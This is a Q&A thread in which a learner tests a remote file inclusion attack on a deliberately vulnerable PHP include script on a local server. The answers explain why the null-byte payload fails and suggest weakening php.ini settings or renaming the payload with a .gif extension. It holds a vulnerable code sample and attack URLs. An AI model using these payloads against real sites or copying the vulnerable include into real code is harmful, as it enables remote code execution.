# PHP null byte include failing explation seeked

Tags: php, file-inclusion

I am watching a tutorial on YouTube about how to include remote files or local through a standard include command.

Here is the code:

```
<?php

if(isset($_GET["language"])) {
    $language = $_GET["language"];
    include($language."gif");
}

?>
```

I got this on a local webserver (WAMP) and I do the tutorial tells me to do.

```
localhost/inctest/index.php?language=http://www.example.com/badcode.php%00
```

> Warning: include(): Failed opening
>   'http://www.example.com/badcode.php' for inclusion 
>   (include_path='.;C:\php\pear') in C:\wamp\www\inctest\index.php on
>   line 5

my PHP.ini:

```
allow_url_include = On
```

I removed my own domain and renamed it to `example.com`.

What did I miss out on?

Answer (score 3):

Null Byte Poisoning is pretty old vulnerability, which has been already fixed since 5.3.4 PHP-version.
[Release Announcement](http://php.net/releases/5_3_4.php):

```
Paths with NULL in them (foo\0bar.txt) are now considered as invalid (CVE-2006-7243).
```

If you are sure, that your PHP-version is correct, please try to inject some remote resource without NULL-byte character in path, to check, if `allow_url_*` are set correct in `php.ini`.

Answer (score 2):

I believe you also need to include in the php.ini the directive of: `allow_url_fopen` to be set to `1`

This allows remote URLs to be loaded using fopen, but considering you're not using fopen, I guess it's not really applicable, but worth a try none the less.

You could also try `register_globals` this variable controls whether arbitrary variables can be injected into a script via a URL parameter.

**[Edit]**

Turn off `magic_quotes_gpc` as that can prevent Null Byte Injection from happening.

Answer (score 0):

As this is a remote file include vulnerability you do not need to rely on null byte injection, simply serve the malicious code with a .gif extension like this:
`http://www.example.com/badcode.php.gif`